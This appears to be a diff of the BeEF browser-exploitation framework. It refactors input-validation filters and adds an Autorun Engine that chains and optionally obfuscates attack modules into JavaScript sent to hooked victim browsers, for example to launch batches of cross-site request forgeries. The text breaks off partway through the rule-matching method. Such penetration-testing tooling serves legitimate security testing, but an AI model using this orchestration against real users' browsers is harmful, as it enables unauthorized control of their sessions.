+    return false unless only?('0-9\.', str)
    not (str =~ /^[\d]+\.[\d]+$/).nil?
  end
  # Check if hex characters only
-  # @param [String] str String for testing
+  #   @param [String] str String for testing
-  # @return [Boolean] If the string only contains hex characters
+  #   @return [Boolean] If the string only contains hex characters
  def self.hexs_only?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    only?('0123456789ABCDEFabcdef', str)
  end
  # Check if first character is a number
-  # @param [String] String for testing
+  #   @param [String] String for testing
-  # @return [Boolean] If the first character of the string is a number
+  #   @return [Boolean] If the first character of the string is a number
  def self.first_char_is_num?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    not (str =~ /^\d.*/).nil?
  end
  # Check for space characters: \t\n\r\f
-  # @param [String] str String for testing
+  #   @param [String] str String for testing
-  # @return [Boolean] If the string has a whitespace character
+  #   @return [Boolean] If the string has a whitespace character
  def self.has_whitespace_char?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    exists?('\s', str)
  end
  # Check for non word characters: a-zA-Z0-9
-  # @param [String] str String for testing
+  #   @param [String] str String for testing
-  # @return [Boolean] If the string only has alphanums
+  #   @return [Boolean] If the string only has alphanums
  def self.alphanums_only?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    only?("a-zA-Z0-9", str)
  end
-        
+
-  # Check if valid ip address string
+  # @overload self.is_valid_ip?(ip, version)
-  # @param [String] ip String for testing
+  # Checks if the given string is a valid IP address
-  # @return [Boolean] If the string is a valid IP address
+  #   @param [String] ip string to be tested
-  # @note only IPv4 compliant
+  #   @param [Symbol] version IP version (either <code>:ipv4</code> or <code>:ipv6</code>)
-  def self.is_valid_ip?(ip)
+  #   @return [Boolean] true if the string is a valid IP address, otherwise false
-    return false if not is_non_empty_string?(ip)
+  #
-    return true if ip =~ /^(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})?$/
+  # @overload self.is_valid_ip?(ip)
  # Checks if the given string is either a valid IPv4 or IPv6 address
  #   @param [String] ip string to be tested
  #   @return [Boolean] true if the string is a valid IPv4 or IPV6 address, otherwise false
  def self.is_valid_ip?(ip, version = :both)
    return false unless is_non_empty_string?(ip)
    valid = case version.inspect.downcase
      when /^:ipv4$/
        ip =~ /^((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}
          (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])$/x
      when /^:ipv6$/
        ip =~ /^(([0-9a-f]{1,4}:){7,7}[0-9a-f]{1,4}|
          ([0-9a-f]{1,4}:){1,7}:|
          ([0-9a-f]{1,4}:){1,6}:[0-9a-f]{1,4}|
          ([0-9a-f]{1,4}:){1,5}(:[0-9a-f]{1,4}){1,2}|
          ([0-9a-f]{1,4}:){1,4}(:[0-9a-f]{1,4}){1,3}|
          ([0-9a-f]{1,4}:){1,3}(:[0-9a-f]{1,4}){1,4}|
          ([0-9a-f]{1,4}:){1,2}(:[0-9a-f]{1,4}){1,5}|
          [0-9a-f]{1,4}:((:[0-9a-f]{1,4}){1,6})|
          :((:[0-9a-f]{1,4}){1,7}|:)|
          fe80:(:[0-9a-f]{0,4}){0,4}%[0-9a-z]{1,}|
          ::(ffff(:0{1,4}){0,1}:){0,1}
          ((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}
          (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|
          ([0-9a-f]{1,4}:){1,4}:
          ((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}
          (25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))$/ix
      when /^:both$/
        is_valid_ip?(ip, :ipv4) || is_valid_ip?(ip, :ipv6)
    end ? true : false
    valid
  end
  # Checks if the given string is a valid private IP address
  #   @param [String] ip string for testing
  #   @return [Boolean] true if the string is a valid private IP address, otherwise false
  # @note Includes RFC1918 private IPv4, private IPv6, and localhost 127.0.0.0/8, but does not include local-link addresses.
  def self.is_valid_private_ip?(ip)
    return false unless is_valid_ip?(ip)
    return ip =~ /\A(^127\.)|(^192\.168\.)|(^10\.)|(^172\.1[6-9]\.)|(^172\.2[0-9]\.)|(^172\.3[0-1]\.)|(^::1$)|(^[fF][cCdD])\z/ ? true : false
  end
  # Checks if the given string is a valid TCP port
  #   @param [String] port string for testing
  #   @return [Boolean] true if the string is a valid TCP port, otherwise false
  def self.is_valid_port?(port)
    valid = false
    valid = true if port.to_i > 0 && port.to_i < 2**16
    valid
  end
  # Checks if string is a valid domain name
  #   @param [String] domain string for testing
  #   @return [Boolean] If the string is a valid domain name
  # @note Only validates the string format. It does not check for a valid TLD since ICANN's list of TLD's is not static.
  def self.is_valid_domain?(domain)
    return false unless is_non_empty_string?(domain)
    return true if domain =~ /^[0-9a-z-]+(\.[0-9a-z-]+)*(\.[a-z]{2,}).?$/i
    false
  end
  # Check for valid browser details characters
-  # @param [String] str String for testing
+  #   @param [String] str String for testing
-  # @return [Boolean] If the string has valid browser details characters
+  #   @return [Boolean] If the string has valid browser details characters
  # @note This function passes the \302\256 character which translates to the registered symbol (r)
  def self.has_valid_browser_details_chars?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    not (str =~ /[^\w\d\s()-.,;:_\/!\302\256]/).nil?  
  end  
  # Check for valid base details characters
-  # @param [String] str String for testing
+  #   @param [String] str String for testing
-  # @return [Boolean] If the string has only valid base characters
+  #   @return [Boolean] If the string has only valid base characters
  # @note This is for basic filtering where possible all specific filters must be implemented
  # @note This function passes the \302\256 character which translates to the registered symbol (r)
  def self.has_valid_base_chars?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    (str =~ /[^\302\256[:print:]]/).nil? 
  end  
  # Verify the yes and no is valid
-  # @param [String] str String for testing
+  #   @param [String] str String for testing
-  # @return [Boolean] If the string is either 'yes' or 'no'
+  #   @return [Boolean] If the string is either 'yes' or 'no'
  # @todo Confirm this is case insensitive
  def self.is_valid_yes_no?(str)
    return false if has_non_printable_char?(str)
-    return false if str !~ /^(Yes|No)$/
+    return false if str !~ /\A(Yes|No)\z/i
    return false if str.length > 200
    true
  end
-  
+
 end
 end
--- a/core/filters/browser.rb
+++ b/core/filters/browser.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -10,28 +10,17 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid browser name characters
  def self.is_valid_browsername?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    return false if str.length > 2
    return false if has_non_printable_char?(str)
    true
  end
  # Check the browser type value - for example, {"FF5":true,"FF":true} & {"S":true}
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid browser type characters
  def self.is_valid_browsertype?(str)
    return false if not is_non_empty_string?(str)
    return false if str.length < 10
    return false if str.length > 500 #CxF - had to increase this because the Chrome detection JSON String is getting bigger.
    return false if has_non_printable_char?(str)
    true
  end
  # Check the Operating System name value - for example, 'Windows XP'
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid Operating System name characters
  def self.is_valid_osname?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    return false if has_non_printable_char?(str)
    return false if str.length < 2
    true
@@ -41,7 +30,7 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid Hardware name characters
  def self.is_valid_hwname?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    return false if has_non_printable_char?(str)
    return false if str.length < 2
    true
@@ -51,11 +40,25 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid browser version characters
  def self.is_valid_browserversion?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    return false if has_non_printable_char?(str)
    return true if str.eql? "UNKNOWN"
    return true if str.eql? "ALL"
    return false if not nums_only?(str) and not is_valid_float?(str)  
-    return false if str.length > 10      
+    return false if str.length > 20
    true
  end
  # Verify the os version string is valid
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid os version characters
  def self.is_valid_osversion?(str)
    return false unless is_non_empty_string?(str)
    return false if has_non_printable_char?(str)
    return true if str.eql? "UNKNOWN"
    return true if str.eql? "ALL"
    return false unless BeEF::Filters::only?("a-zA-Z0-9.<=> ", str)
    return false if str.length > 20
    true
  end
@@ -63,7 +66,7 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid browser / ua string characters
  def self.is_valid_browserstring?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    return false if has_non_printable_char?(str)
    return false if str.length > 300      
    true
@@ -73,33 +76,17 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid cookie characters
  def self.is_valid_cookies?(str)
    return false unless is_non_empty_string?(str)
    return false if has_non_printable_char?(str)
    return false if str.length > 2000
    true
  end
  # Verify the screen size is valid
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid screen size characters
  def self.is_valid_screen_size?(str)
    return false if has_non_printable_char?(str)
    return false if str.length > 200
    true
  end
  # Verify the window size is valid
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid window size characters
  def self.is_valid_window_size?(str)
    return false if has_non_printable_char?(str)
    return false if str.length > 200
    true
  end
  # Verify the system platform is valid
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid system platform characters
  def self.is_valid_system_platform?(str)
    return false unless is_non_empty_string?(str)
    return false if has_non_printable_char?(str)
    return false if str.length > 200
    true
@@ -109,6 +96,7 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid date stamp characters
  def self.is_valid_date_stamp?(str)
    return false unless is_non_empty_string?(str)
    return false if has_non_printable_char?(str)
    return false if str.length > 200
    true
@@ -118,7 +106,27 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid CPU type characters
  def self.is_valid_cpu?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    return false if has_non_printable_char?(str)
    return false if str.length > 200
    true
  end
  # Verify the memory string is valid
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid memory type characters
  def self.is_valid_memory?(str)
    return false unless is_non_empty_string?(str)
    return false if has_non_printable_char?(str)
    return false if str.length > 200
    true
  end
  # Verify the GPU type string is valid
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid GPU type characters
  def self.is_valid_gpu?(str)
    return false unless is_non_empty_string?(str)
    return false if has_non_printable_char?(str)
    return false if str.length > 200
    true
@@ -130,9 +138,9 @@ module Filters
  # @note This string can be empty if there are no browser plugins
  # @todo Verify if the ruby version statement is still necessary
  def self.is_valid_browser_plugins?(str)
-    return true if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    return false if str.length > 1000
-    if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8')
+    if str.encoding === Encoding.find('UTF-8')
      return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
    else
      return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?
--- a/core/filters/command.rb
+++ b/core/filters/command.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -11,26 +11,17 @@ module Filters
  # @return [Boolean] If the string has valid path characters
  def self.is_valid_path_info?(str)
    return false if str.nil?
-    return false if not str.is_a? String
+    return false unless str.is_a? String
    return false if has_non_printable_char?(str)
    true
  end
  # Check if the command id valid
  # @param [String] str String for testing
  # @return [Boolean] If the string is a valid command id
  def self.is_valid_command_id?(str)
    return false if not is_non_empty_string?(str)
    return false if not nums_only?(str)   
    true
  end
  # Check if the session id valid
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid hook session id characters
  def self.is_valid_hook_session_id?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
-    return false if not has_valid_key_chars?(str) 
+    return false unless has_valid_key_chars?(str) 
    true
  end
@@ -38,8 +29,8 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid command module datastore key characters
  def self.is_valid_command_module_datastore_key?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
-    return false if not has_valid_key_chars?(str)      
+    return false unless has_valid_key_chars?(str)      
    true
  end
@@ -48,7 +39,7 @@ module Filters
  # @return [Boolean] If the string has valid command module datastore param characters
  def self.is_valid_command_module_datastore_param?(str)
    return false if has_null?(str)
-    return false if not has_valid_base_chars?(str)
+    return false unless has_valid_base_chars?(str)
    true
  end
@@ -56,8 +47,8 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string has valid key characters
  def self.has_valid_key_chars?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
-    return false if not has_valid_base_chars?(str)
+    return false unless has_valid_base_chars?(str)
    true
  end
@@ -66,9 +57,9 @@ module Filters
  # @return [Boolean] If the sting has valid param characters
  def self.has_valid_param_chars?(str)
    return false if str.nil?
-    return false if not str.is_a? String
+    return false unless str.is_a? String
    return false if str.empty?
-    return false if not (str =~ /[^\w_\:]/).nil?
+    return false unless (str =~ /[^\w_\:]/).nil?
    true
  end
--- a/core/filters/http.rb
+++ b/core/filters/http.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -10,12 +10,10 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string is a valid hostname
  def self.is_valid_hostname?(str)
-    return false if not is_non_empty_string?(str)
+    return false unless is_non_empty_string?(str)
    return false if has_non_printable_char?(str)
    return false if str.length > 255
    return false if (str =~ /^[a-zA-Z0-9][a-zA-Z0-9\-\.]*[a-zA-Z0-9]$/).nil?
    return false if not (str =~ /\.\./).nil?
    return false if not (str =~ /\-\-/).nil?      
    true
  end
--- a/core/filters/page.rb
+++ b/core/filters/page.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -10,7 +10,7 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string is a valid page title
  def self.is_valid_pagetitle?(str)
-    return false if not str.is_a? String
+    return false unless str.is_a? String
    return false if has_non_printable_char?(str)
    return false if str.length > 500 # CxF Increased this because some page titles are MUCH longer
    true
@@ -20,7 +20,7 @@ module Filters
  # @param [String] str String for testing
  # @return [Boolean] If the string is a valid referrer
  def self.is_valid_pagereferrer?(str)
-    return false if not str.is_a? String
+    return false unless str.is_a? String
    return false if has_non_printable_char?(str)
    return false if str.length > 350
    true
--- a/core/hbmanager.rb
+++ b/core/hbmanager.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/loader.rb
+++ b/core/loader.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -7,7 +7,14 @@
 # @note Include here all the gems we are using
 require 'rubygems'
 require 'bundler/setup'
 # For some reason, on Ruby 2.5+, msgpack needs to be loaded first,
 # else metasploit integration dies due to undefined `to_msgpack`.
 # Works fine on Ruby 2.4
 require 'msgpack'
 Bundler.require(:default)
 require 'cgi'
 require 'yaml'
 require 'singleton'
@@ -15,8 +22,23 @@ require 'ipaddr'
 require 'base64'
 require 'xmlrpc/client'
 require 'openssl'
-require 'rubydns'
+require 'eventmachine'
-require 'sourcify'
+require 'thin'
 require 'rack'
 require 'em-websocket'
 require 'uglifier'
 require 'execjs'
 require 'ansi'
 require 'term/ansicolor'
 require 'json'
 require 'data_objects'
 require 'parseconfig'
 require 'erubis'
 require 'mime/types'
 require 'optparse'
 require 'resolv'
 require 'digest'
 require 'zip'
 # @note Include the filters
 require 'core/filters'
--- a/core/main/autorun_engine/engine.rb
+++ b/core/main/autorun_engine/engine.rb
@@ -0,0 +1,499 @@
 #
 # Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module Core
    module AutorunEngine
      class Engine
        include Singleton
        def initialize
          @config = BeEF::Core::Configuration.instance
          @result_poll_interval = @config.get('beef.autorun.result_poll_interval')
          @result_poll_timeout = @config.get('beef.autorun.result_poll_timeout')
          @continue_after_timeout = @config.get('beef.autorun.continue_after_timeout')
          @debug_on = @config.get('beef.debug')
          @VERSION = ['<','<=','==','>=','>','ALL']
          @VERSION_STR = ['XP','Vista']
        end
        # Check if the hooked browser type/version and OS type/version match any Rule-sets
        # stored in the BeEF::Core::AutorunEngine::Models::Rule database table
        # If one or more Rule-sets do match, trigger the module chain specified
        def run(hb_id, browser_name, browser_version, os_name, os_version)
          are = BeEF::Core::AutorunEngine::Engine.instance
          match_rules = are.match(browser_name, browser_version, os_name, os_version)
          are.trigger(match_rules, hb_id) if match_rules !=nil && match_rules.length > 0
        end
        # Prepare and return the JavaScript of the modules to be sent.
        # It also updates the rules ARE execution table with timings
        def trigger(rule_ids, hb_id)
          hb = BeEF::HBManager.get_by_id(hb_id)
          hb_session = hb.session
          rule_ids.each do |rule_id|
            rule = BeEF::Core::AutorunEngine::Models::Rule.get(rule_id)
            modules = JSON.parse(rule.modules)
            execution_order = JSON.parse(rule.execution_order)
            execution_delay = JSON.parse(rule.execution_delay)
            chain_mode  = rule.chain_mode
            mods_bodies = Array.new
            mods_codes = Array.new
            mods_conditions = Array.new
            # this ensures that if both rule A and rule B call the same module in sequential mode,
            # execution will be correct preventing wrapper functions to be called with equal names.
            rule_token = SecureRandom.hex(5)
            modules.each do |cmd_mod|
              mod = BeEF::Core::Models::CommandModule.first(:name => cmd_mod['name'])
              options = []
              replace_input = false
              cmd_mod['options'].each do|k,v|
                options.push({'name' => k, 'value' => v})
                replace_input = true if v == '<<mod_input>>'
              end
              command_body = prepare_command(mod, options, hb_id, replace_input, rule_token)
              mods_bodies.push(command_body)
              mods_codes.push(cmd_mod['code'])
              mods_conditions.push(cmd_mod['condition'])
            end
            # Depending on the chosen chain mode (sequential or nested/forward), prepare the appropriate wrapper
            case chain_mode
              when 'nested-forward'
                wrapper = prepare_nested_forward_wrapper(mods_bodies, mods_codes, mods_conditions, execution_order, rule_token)
              when 'sequential'
                wrapper = prepare_sequential_wrapper(mods_bodies, execution_order, execution_delay, rule_token)
              else
                wrapper = nil
                print_error "Chain mode looks wrong!"
                # TODO catch error, which should never happen as values are checked way before ;-)
            end
            are_exec = BeEF::Core::AutorunEngine::Models::Execution.new(
                :session => hb_session,
                :mod_count => modules.length,
                :mod_successful => 0,
                :rule_token => rule_token,
                :mod_body => wrapper,
                :is_sent => false,
                :rule_id => rule_id
            )
            are_exec.save
            # Once Engine.check() verified that the hooked browser match a Rule, trigger the Rule ;-)
            print_more "Triggering ruleset #{rule_ids.to_s} on HB #{hb_id}"
          end
        end
        # Wraps module bodies in their own function, using setTimeout to trigger them with an eventual delay.
        # Launch order is also taken care of.
        #  - sequential chain with delays (setTimeout stuff)
        #    ex.: setTimeout(module_one(),   0);
        #         setTimeout(module_two(),   2000);
        #         setTimeout(module_three(), 3000);
        # Note: no result status is checked here!! Useful if you just want to launch a bunch of modules without caring
        #  what their status will be (for instance, a bunch of XSRFs on a set of targets)
        def prepare_sequential_wrapper(mods, order, delay, rule_token)
          wrapper = ''
          delayed_exec = ''
          c = 0
          while c < mods.length
            delayed_exec += %Q| setTimeout(function(){#{mods[order[c]][:mod_name]}_#{rule_token}();}, #{delay[c]}); |
            mod_body = mods[order[c]][:mod_body].to_s.gsub("#{mods[order[c]][:mod_name]}_mod_output", "#{mods[order[c]][:mod_name]}_#{rule_token}_mod_output")
            wrapped_mod = "#{mod_body}\n"
            wrapper += wrapped_mod
            c += 1
          end
          wrapper += delayed_exec
          print_more "Final Modules Wrapper:\n #{wrapper}" if @debug_on
          wrapper
        end
        # Wraps module bodies in their own function, then start to execute them from the first, polling for
        # command execution status/results (with configurable polling interval and timeout).
        # Launch order is also taken care of.
        #  - nested forward chain with status checks (setInterval to wait for command to return from async operations)
        #    ex.:  module_one()
        #           if condition
        #             module_two(module_one_output)
        #               if condition
        #                  module_three(module_two_output)
        #
        # Note: command result status is checked, and you can properly chain input into output, having also
        # the flexibility of slightly mangling it to adapt to module needs.
        # Note: Useful in situations where you want to launch 2 modules, where the second one will execute only
        #     if the first once return with success. Also, the second module has the possibility of mangling first
        #     module output and use it as input for some of its module inputs.
        def prepare_nested_forward_wrapper(mods, code, conditions, order, rule_token)
          wrapper, delayed_exec = '',''
          delayed_exec_footers = Array.new
          c = 0
          while c < mods.length
            if mods.length == 1
              i = c
            else
              i = c + 1
            end
            code_snippet = ''
            mod_input = ''
            if code[c] != 'null' && code[c] != ''
              code_snippet = code[c]
              mod_input = 'mod_input'
            end
            conditions[i] = true if conditions[i] == nil || conditions[i] == ''
            if c == 0
              # this is the first wrapper to prepare
              delayed_exec += %Q|
                function #{mods[order[c]][:mod_name]}_#{rule_token}_f(){
                  #{mods[order[c]][:mod_name]}_#{rule_token}();
                  // TODO add timeout to prevent infinite loops
                  function isResReady(mod_result, start){
                    if (mod_result === null && parseInt(((new Date().getTime()) - start)) < #{@result_poll_timeout}){
                       // loop
                    }else{
                       // module return status/data is now available
                       clearInterval(resultReady);
                          if (mod_result === null && #{@continue_after_timeout}){
                              var mod_result = [];
                              mod_result[0] = 1; //unknown status
                              mod_result[1] = '' //empty result
                          }
                          var status = mod_result[0];
                       if(#{conditions[i]}){
                         #{mods[order[i]][:mod_name]}_#{rule_token}_can_exec = true;
                         #{mods[order[c]][:mod_name]}_#{rule_token}_mod_output = mod_result[1];
              |
              delayed_exec_footer = %Q|
                     }
                    }
                  }
                  var start = (new Date()).getTime();
                  var resultReady = setInterval(function(){var start = (new Date()).getTime(); isResReady(#{mods[order[c]][:mod_name]}_#{rule_token}_mod_output, start);},#{@result_poll_interval});
                }
                #{mods[order[c]][:mod_name]}_#{rule_token}_f();
              |
              delayed_exec_footers.push(delayed_exec_footer)
            elsif c < mods.length - 1
              code_snippet = code_snippet.to_s.gsub(mods[order[c-1]][:mod_name], "#{mods[order[c-1]][:mod_name]}_#{rule_token}")
              # this is one of the wrappers in the middle of the chain
              delayed_exec += %Q|
                function #{mods[order[c]][:mod_name]}_#{rule_token}_f(){
                  if(#{mods[order[c]][:mod_name]}_#{rule_token}_can_exec){
                     #{code_snippet}
                     #{mods[order[c]][:mod_name]}_#{rule_token}(#{mod_input});
                     function isResReady(mod_result, start){
                        if (mod_result === null && parseInt(((new Date().getTime()) - start)) < #{@result_poll_timeout}){
                           // loop
                        }else{
                           // module return status/data is now available
                         clearInterval(resultReady);
                          if (mod_result === null && #{@continue_after_timeout}){
                              var mod_result = [];
                              mod_result[0] = 1; //unknown status
                              mod_result[1] = '' //empty result
                          }
                          var status = mod_result[0];
                          if(#{conditions[i]}){
                             #{mods[order[i]][:mod_name]}_#{rule_token}_can_exec = true;
                             #{mods[order[c]][:mod_name]}_#{rule_token}_mod_output = mod_result[1];
              |
              delayed_exec_footer = %Q|
                         }
                       }
                     }
                     var start = (new Date()).getTime();
                     var resultReady = setInterval(function(){ isResReady(#{mods[order[c]][:mod_name]}_#{rule_token}_mod_output, start);},#{@result_poll_interval});
                  }
                }
                #{mods[order[c]][:mod_name]}_#{rule_token}_f();
              |
              delayed_exec_footers.push(delayed_exec_footer)
            else
              code_snippet = code_snippet.to_s.gsub(mods[order[c-1]][:mod_name], "#{mods[order[c-1]][:mod_name]}_#{rule_token}")
              # this is the last wrapper to prepare
              delayed_exec += %Q|
                function #{mods[order[c]][:mod_name]}_#{rule_token}_f(){
                  if(#{mods[order[c]][:mod_name]}_#{rule_token}_can_exec){
                     #{code_snippet}
                     #{mods[order[c]][:mod_name]}_#{rule_token}(#{mod_input});
                  }
                }
                #{mods[order[c]][:mod_name]}_#{rule_token}_f();
              |
            end
            mod_body = mods[order[c]][:mod_body].to_s.gsub("#{mods[order[c]][:mod_name]}_mod_output", "#{mods[order[c]][:mod_name]}_#{rule_token}_mod_output")
            wrapped_mod = "#{mod_body}\n"
            wrapper += wrapped_mod
            c += 1
          end
          wrapper += delayed_exec + delayed_exec_footers.reverse.join("\n")
          print_more "Final Modules Wrapper:\n #{delayed_exec + delayed_exec_footers.reverse.join("\n")}" if @debug_on
          wrapper
        end
        # prepare the command module (compiling the Erubis templating stuff), eventually obfuscate it,
        # and store it in the database.
        # Returns the raw module body after template substitution.
        def prepare_command(mod, options, hb_id, replace_input, rule_token)
          config = BeEF::Core::Configuration.instance
          begin
            command = BeEF::Core::Models::Command.new(
                :data => options.to_json,
                :hooked_browser_id => hb_id,
                :command_module_id => BeEF::Core::Configuration.instance.get("beef.module.#{mod.name}.db.id"),
                :creationdate => Time.new.to_i,
                :instructions_sent => true
            )
            command.save
            command_module = BeEF::Core::Models::CommandModule.first(:id => mod.id)
            if (command_module.path.match(/^Dynamic/))
              # metasploit and similar integrations
              command_module = BeEF::Modules::Commands.const_get(command_module.path.split('/').last.capitalize).new
            else
              # normal modules always here
              key = BeEF::Module.get_key_by_database_id(mod.id)
              command_module = BeEF::Core::Command.const_get(config.get("beef.module.#{key}.class")).new(key)
            end
            hb = BeEF::HBManager.get_by_id(hb_id)
            hb_session = hb.session
            command_module.command_id = command.id
            command_module.session_id = hb_session
            command_module.build_datastore(command.data)
            command_module.pre_send
            build_missing_beefjs_components(command_module.beefjs_components) unless command_module.beefjs_components.empty?
            if config.get("beef.extension.evasion.enable")
              evasion = BeEF::Extension::Evasion::Evasion.instance
              command_body = evasion.obfuscate(command_module.output) + "\n\n"
            else
              command_body = command_module.output  + "\n\n"
            end
            # @note prints the event to the console
            print_more "Preparing JS for command id [#{command.id}], module [#{mod.name}]"
            replace_input ? mod_input = 'mod_input' : mod_input = ''
            result = %Q|
                var #{mod.name}_#{rule_token} = function(#{mod_input}){
                    #{clean_command_body(command_body, replace_input)}
                };
                var #{mod.name}_#{rule_token}_can_exec = false;
                var #{mod.name}_#{rule_token}_mod_output = null;
            |
            return {:mod_name => mod.name, :mod_body => result}
          rescue =>  e
            print_error e.message
            print_debug e.backtrace.join("\n")
          end
        end
        # Removes the beef.execute wrapper in order that modules are executed in the ARE wrapper, rather than
        # using the default behavior of adding the module to an array and execute it at polling time.
        #
        # Also replace <<mod_input>> with mod_input variable if needed for chaining module output/input
        def clean_command_body(command_body, replace_input)
          begin
            cmd_body = command_body.lines.map(&:chomp)
            wrapper_start_index,wrapper_end_index = nil
            cmd_body.each_with_index do |line, index|
              if line.to_s =~ /^(beef|[a-zA-Z]+)\.execute\(function\(\)/
                wrapper_start_index = index
                break
              end
            end
            if wrapper_start_index.nil?
              print_error "[ARE] Could not find module start index"
            end
            cmd_body.reverse.each_with_index do |line, index|
              if line.include?('});')
                wrapper_end_index = index
                break
              end
            end
            if wrapper_end_index.nil?
              print_error "[ARE] Could not find module end index"
            end
            cleaned_cmd_body = cmd_body.slice(wrapper_start_index..-(wrapper_end_index+1)).join("\n")
            if cleaned_cmd_body.eql?('')
              print_error "[ARE] No command to send"
            end
            # check if <<mod_input>> should be replaced with a variable name (depending if the variable is a string or number)
            if replace_input
              if cleaned_cmd_body.include?('"<<mod_input>>"')
                final_cmd_body = cleaned_cmd_body.gsub('"<<mod_input>>"','mod_input')
              elsif cleaned_cmd_body.include?('\'<<mod_input>>\'')
                final_cmd_body = cleaned_cmd_body.gsub('\'<<mod_input>>\'','mod_input')
              elsif cleaned_cmd_body.include?('<<mod_input>>')
                final_cmd_body = cleaned_cmd_body.gsub('\'<<mod_input>>\'','mod_input')
              else
                return cleaned_cmd_body
              end
              return final_cmd_body
            else
              return cleaned_cmd_body
            end
          rescue =>  e
            print_error "[ARE] There is likely a problem with the module's command.js parsing. Check Engine.clean_command_body"
          end
        end
        # Checks if there are any ARE rules to be triggered for the specified hooked browser
        #
        # Note: browser version checks are supporting only major versions, ex: C 43, IE 11
        # Note: OS version checks are supporting major/minor versions, ex: OSX 10.10, Windows 8.1
        #
        # Returns an array with rule IDs that matched and should be triggered.
        # if rule_id is specified, checks will be executed only against the specified rule (useful
        #  for dynamic triggering of new rulesets ar runtime)
        def match(browser, browser_version, os, os_version, rule_id=nil)
          match_rules = []
          if rule_id != nil
            rules = [BeEF::Core::AutorunEngine::Models::Rule.get(rule_id)]
          else
            rules = BeEF::Core::AutorunEngine::Models::Rule.all()
          end
          return nil if rules == nil
          return nil unless rules.length > 0
          print_info "[ARE] Checking if any defined rules should be triggered on target."
          # TODO handle cases where there are multiple ARE rules for the same hooked browser.
